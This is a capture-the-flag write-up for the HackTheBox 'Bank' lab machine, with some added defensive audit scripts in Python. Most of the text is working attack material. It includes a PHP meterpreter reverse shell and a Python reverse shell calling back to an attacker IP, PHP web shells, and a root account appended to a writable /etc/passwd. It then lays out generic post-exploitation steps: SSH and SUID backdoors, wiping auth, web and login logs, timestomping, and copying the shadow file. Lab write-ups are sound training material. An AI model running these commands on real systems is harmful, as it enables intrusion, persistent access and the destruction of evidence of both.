HackTheBox Bank

Writeup for HackTheBox Bank

Machine Synopsis

Key Exploitation Techniques:

  • DNS enumeration via HTTP redirects and hostname discovery
  • File upload vulnerability exploitation with extension bypass (.htb)
  • SUID binary privilege escalation
  • Writable /etc/passwd exploitation for root access

Reconnaissance & Enumeration

Port Discovery

$ nmap -sC -sV -A 10.10.10.29
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)

DNS and Hostname Discovery

Based on the machine name “Bank” and presence of DNS service, the hostname bank.htb was tested:

# Add hostname to /etc/hosts
$ echo "10.10.10.29 bank.htb" >> /etc/hosts

# Verify hostname resolution
$ nslookup bank.htb
Server:     10.10.10.29
Address:    10.10.10.29#53

Name:       bank.htb
Address:    10.10.10.29

Web Application Analysis

[Screenshot: HomePage.png]

# Directory enumeration
$ gobuster dir --url http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50
/support.php          (Status: 302)
/uploads              (Status: 301)
/login.php            (Status: 200)
/inc                  (Status: 301)
/balance-transfer     (Status: 301)

[Screenshot: Login.png]

Key Findings:

  • Login portal at /login.php
  • File upload directory at /uploads
  • Balance transfer directory at /balance-transfer

Exploitation

Credential Discovery

# Analyze balance-transfer directory
$ curl -s http://bank.htb/balance-transfer/ | grep -E "href.*\.acc" | head -10

# Sort files by size to identify anomalies
$ curl -s http://bank.htb/balance-transfer/ | grep -E "[0-9]+ bytes" | sort -k3 -n | head -5

[Screenshot: BalanceTransfer.png]

[Screenshot: InterestingFile.png]

Analysis Results:

  • Most files are ~584 bytes
  • One file significantly smaller (~257 bytes)
  • Smaller file contains plaintext credentials instead of encrypted data

# Download suspicious file
$ wget http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc

$ cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

Accnt Balance: 285424.00

Username: chris@bank.htb
Password: !##HTBB4nkP$ssw0rd!##
Email: chris@bank.htb

Discovered Credentials: chris@bank.htb:!##HTBB4nkP$ssw0rd!##
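The size-anomaly check described above, done programmatically rather than by eye. This is an added example and not part of the original writeup: it parses a constructed Apache autoindex listing (the sample HTML below is an assumption modelled on the default listing format, with only the hash-named file taken from the page) and flags files whose size deviates from the median. The same check is useful when auditing your own exposed directory listings for a stray file that does not match its neighbours.

```python
import re
import statistics

# Constructed sample of an Apache autoindex listing (an assumption; not the
# real bank.htb page). One row per account file, size in bytes last.
SAMPLE_LISTING = """\
<html><body><pre>
<a href="0a1b.acc">0a1b.acc</a>                2017-05-28 23:25  584
<a href="1c2d.acc">1c2d.acc</a>                2017-05-28 23:25  585
<a href="68576f20e9732f1b2edc4df5b8533230.acc">68576f20e9732f1b2edc4df5b8533230.acc</a>  2017-05-28 23:25  257
<a href="2e3f.acc">2e3f.acc</a>                2017-05-28 23:25  583
<a href="3a4b.acc">3a4b.acc</a>                2017-05-28 23:25  584
</pre></body></html>
"""

# Match the link target of a .acc row and the byte count at the end of the row.
ROW_RE = re.compile(r'href="(?P<name>[^"]+\.acc)".*?(?P<size>\d+)\s*$')


def parse_listing(html):
    """Return {filename: size_in_bytes} for every .acc row in the listing."""
    files = {}
    for line in html.splitlines():
        m = ROW_RE.search(line)
        if m:
            files[m.group("name")] = int(m.group("size"))
    return files


def size_outliers(files, tolerance=0.2):
    """Return the names of files whose size differs from the median by more
    than `tolerance` (a fraction of the median), sorted for stable output."""
    if not files:
        return []
    median = statistics.median(files.values())
    return sorted(
        name for name, size in files.items()
        if abs(size - median) > tolerance * median
    )


if __name__ == "__main__":
    listing = parse_listing(SAMPLE_LISTING)
    for name in size_outliers(listing):
        print(f"{name}: {listing[name]} bytes (median {statistics.median(listing.values())})")
```

Feeding the script the real listing is a matter of replacing `SAMPLE_LISTING` with the body of the `curl` response; the median-based threshold is deliberately robust to a single oddball file pulling the average.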

Web Application Access

Login to the banking portal reveals a file upload interface in the support ticket system.

[Screenshot: Dashboard.png]

[Screenshot: Dashboard_2.png]

File Upload Vulnerability

[Screenshot: PageSource.png]

Upload Restriction Analysis

Page source inspection reveals:

<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->

Key Finding: .htb extension executes as PHP
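A debug mapping like the one found here is exactly the kind of thing a configuration audit should catch before an attacker does. The following is an added example, not code from the writeup or from the box: it scans a constructed Apache configuration fragment (an assumption; bank.htb's real config is not shown on the page) for `AddType` and `AddHandler` directives that route an extension to a PHP handler, and reports any extension outside the expected set.

```python
import re

# Constructed Apache configuration fragment (an assumption, not the machine's
# real config). The .htb mapping mirrors the debug comment found in the page source.
SAMPLE_CONFIG = """\
# PHP handler configuration
AddType application/x-httpd-php .php
# [DEBUG] temporary mapping for debugging purposes only
AddType application/x-httpd-php .htb
AddHandler php5-script .phtml
AddType text/html .shtml
"""

# AddType <mime-type> <ext>...   /   AddHandler <handler-name> <ext>...
DIRECTIVE_RE = re.compile(r'^\s*(AddType|AddHandler)\s+(\S+)\s+(.+?)\s*$', re.IGNORECASE)

# The only extension that should execute as PHP on this host (assumption).
EXPECTED_PHP_EXTENSIONS = frozenset({".php"})


def php_extensions(config_text):
    """Return the set of extensions that AddType/AddHandler map to a PHP handler.
    Commented-out lines do not match the directive regex and are skipped."""
    exts = set()
    for line in config_text.splitlines():
        m = DIRECTIVE_RE.match(line)
        if not m:
            continue
        _directive, handler, ext_list = m.groups()
        if "php" in handler.lower():
            for ext in ext_list.split():
                # Apache accepts extensions with or without the leading dot.
                exts.add(ext if ext.startswith(".") else "." + ext)
    return exts


def unexpected_php_extensions(config_text, expected=EXPECTED_PHP_EXTENSIONS):
    """Extensions that execute as PHP but are not in the approved list."""
    return sorted(php_extensions(config_text) - set(expected))


if __name__ == "__main__":
    for ext in unexpected_php_extensions(SAMPLE_CONFIG):
        print(f"unexpected PHP handler mapping: {ext}")
```

Running the same function over `.htaccess` files under the document root matters as much as over the main config, since `AddType` is honoured there whenever `AllowOverride` permits it; an upload directory with `php_admin_flag engine off` (or no handler at all) would have closed this path regardless of the extension.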

PHP Reverse Shell Creation

# Create PHP reverse shell
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f raw > shell.htb

# Setup Metasploit handler
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST 10.10.14.2
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Shell Deployment

  1. Upload shell.htb through support ticket interface
  2. Access uploaded file: http://bank.htb/uploads/shell.htb

[*] Started reverse TCP handler on 10.10.14.2:1234 
[*] Meterpreter session 1 opened (10.10.14.2:1234 -> 10.10.10.29:35630)

meterpreter > shell
www-data@bank:/var/www/bank/uploads$ whoami
www-data

Privilege Escalation

SUID Binary Discovery

www-data@bank:/var/www/bank/uploads$ find / -type f -user root -perm -4000 2>/dev/null
/var/htb/bin/emergency

Critical Finding: /var/htb/bin/emergency - Custom SUID binary

SUID Binary Exploitation

www-data@bank:/var/www/bank/uploads$ /var/htb/bin/emergency
# whoami
root
# cat /home/chris/user.txt
c81ee9df3751ccf82b64af3046a3269a
# cat /root/root.txt
e92b13e6ff0dd9361add88e07b6687c9

Alternative: /etc/passwd Exploitation

# Verify writable permissions
www-data@bank:/var/www/bank/uploads$ ls -l /etc/passwd /etc/shadow
-rw-rw-rw- 1 root root   1252 May 28  2017 /etc/passwd
-rw-r----- 1 root shadow  895 Jun 14  2017 /etc/shadow

Alternative Path: /etc/passwd is world-writable

# Generate password hash
$ openssl passwd -1 shiro
$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/

# Add root user to /etc/passwd
www-data@bank:/var/www/bank/uploads$ echo 'shiro:$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/:0:0:pwned:/root:/bin/bash' >> /etc/passwd

# Switch to new root user
www-data@bank:/var/www/bank/uploads$ su - shiro
Password: shiro
root@bank:~# whoami
root
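Both the world-writable mode and the appended entry leave clear traces, and checking for them is a routine host audit. This added example is not from the writeup: it audits a constructed `/etc/passwd` (the standard entries are assumptions; the `shiro` line is the one shown above) for additional UID 0 accounts and for password hashes stored directly in the file instead of `x`, and separately checks a file mode for world-writability.

```python
import stat

# Constructed /etc/passwd content (an assumption): ordinary entries followed by
# the kind of line this writeup appends. Only the last line comes from the page.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
shiro:$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/:0:0:pwned:/root:/bin/bash
"""

# Values that legitimately appear in the password field of /etc/passwd:
# 'x' (hash lives in /etc/shadow), or a locked/empty marker.
SHADOWED_MARKERS = ("x", "*", "!", "")


def audit_passwd(text):
    """Return a list of (line_number, finding, subject) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append((lineno, "extra UID 0 account", name))
        if pw not in SHADOWED_MARKERS:
            # A real hash here bypasses /etc/shadow entirely and lets anyone
            # who can read passwd attempt to crack it offline.
            findings.append((lineno, "password hash stored in passwd", name))
    return findings


def is_world_writable(mode):
    """True when the 'other' write bit is set on a st_mode value."""
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    import os
    path = "/etc/passwd"
    if is_world_writable(os.stat(path).st_mode):
        print(f"{path} is world-writable")
    with open(path) as fh:
        for lineno, finding, subject in audit_passwd(fh.read()):
            print(f"{path}:{lineno}: {finding}: {subject}")
```

A file integrity monitor or a one-line cron check (`find /etc/passwd -perm -o+w`) would have flagged the `-rw-rw-rw-` mode shown above long before the box was ever attacked; the audit function is the complementary content check for when the mode looks right but the contents do not.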

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f bank_persistence

# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
# chmod 700 /root/.ssh

Web Shell Maintenance

# Create PHP backdoor
# cat > /var/www/bank/uploads/.system.php << 'EOF'
<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
EOF

# Make the file immutable (chattr +i prevents deletion or modification; it does not hide the file from listings)
# chattr +i /var/www/bank/uploads/.system.php

SUID Backdoor

# Create additional SUID shell
# cp /bin/bash /tmp/.bank_shell
# chmod 4755 /tmp/.bank_shell

# Test backdoor
www-data@bank:/tmp$ /tmp/.bank_shell -p
bash-4.3# whoami
root

Defense Evasion

Log Cleanup

# Clear web server logs
# > /var/log/apache2/access.log
# > /var/log/apache2/error.log

# Clear system logs
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/wtmp
# > /var/log/lastlog

# Clear command histories
# > /root/.bash_history
# > /var/www/.bash_history

File Attribute Manipulation

# Make backdoor files immutable (the +i attribute blocks deletion; it does not hide the files)
# chattr +i /tmp/.bank_shell
# chattr +i /var/www/bank/uploads/.system.php

# Timestomp to match system files
# touch -r /bin/bash /tmp/.bank_shell

Lateral Movement Preparation

Network Discovery

# Discover network topology
# ip route show
# arp -a

# Internal network scanning
# for i in {1..254}; do ping -c 1 -W 1 10.10.10.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done

Credential Harvesting

# Search banking application for database credentials
# grep -r "password\|mysql\|database" /var/www/bank/ 2>/dev/null

# Extract shadow file
# cp /etc/shadow /tmp/shadow.backup

# Search for SSH keys
# find /home -name "id_*" -o -name "*.pem" 2>/dev/null

Service Enumeration

# List active services
# ss -tlnp

# Check for database services
# ps aux | grep -E "(mysql|postgres|mongo)"

# Examine running processes
# ps aux --forest

Alternative Exploitation Methods

Manual File Upload

# Test various extensions
$ for ext in php php3 php4 php5 phtml htb; do
    echo "<?php system('id'); ?>" > test.$ext
    curl -F "file=@test.$ext" http://bank.htb/upload_endpoint
done

SQL Injection Testing

# Test login form for SQL injection
$ sqlmap -u "http://bank.htb/login.php" --data "email=admin&password=admin" --batch

Directory Traversal

# Test for directory traversal in file parameters
$ curl "http://bank.htb/include.php?file=../../../../etc/passwd"

Alternative PHP Shells

Simple Command Shell

<?php
if(isset($_GET['c'])) {
    system($_GET['c']);
}
?>

Python Reverse Shell

<?php
system('python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"');
?>

Alternative Privilege Escalation

LinPEAS Enumeration

# Transfer and run LinPEAS
www-data@bank:/tmp$ wget 10.10.14.2/linpeas.sh
www-data@bank:/tmp$ chmod +x linpeas.sh
www-data@bank:/tmp$ ./linpeas.sh

Kernel Exploitation

# Check kernel version
www-data@bank:/tmp$ uname -a
Linux bank 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015

# Search for kernel exploits
$ searchsploit linux kernel 3.19 | grep -i privilege

Sudo Misconfiguration

# Check for sudo privileges
www-data@bank:/tmp$ sudo -l 2>/dev/null

# Check for NOPASSWD entries
www-data@bank:/tmp$ grep -i nopasswd /etc/sudoers 2>/dev/null

This post is licensed under CC BY 4.0 by the author.